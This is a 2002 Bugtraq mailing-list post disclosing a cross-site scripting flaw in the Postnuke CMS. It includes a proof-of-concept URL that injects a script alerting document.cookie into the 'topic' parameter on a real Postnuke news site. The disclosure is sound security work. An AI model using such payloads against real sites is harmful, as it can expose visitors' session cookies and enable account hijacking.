Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

bugtraq logo Bugtraq mailing list archives

Postnuke XSS issues
From: Mark Grimes <mark () stateful net>
Date: Wed, 25 Sep 2002 11:44:56 -0700
I got an awful lot of email from BUGTRAQers saying that the solution
for PHPNUKE's problems is to use Postnuke.  This is obviously not
a panacea.

http://news.postnuke.com/modules.php?op=modload&name=News&file=index&catid=&topic=><script>alert(document.cookie);</script>

It's obviously apparent that CMS has a long way to go.  Godspeed
to those deploying it in production environments.  May the force be
with you.

-- 
Mark Grimes <mark () stateful net>
Stateful Labs

  By Date           By Thread  

Current thread:
  • Postnuke XSS issues Mark Grimes (Sep 26)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]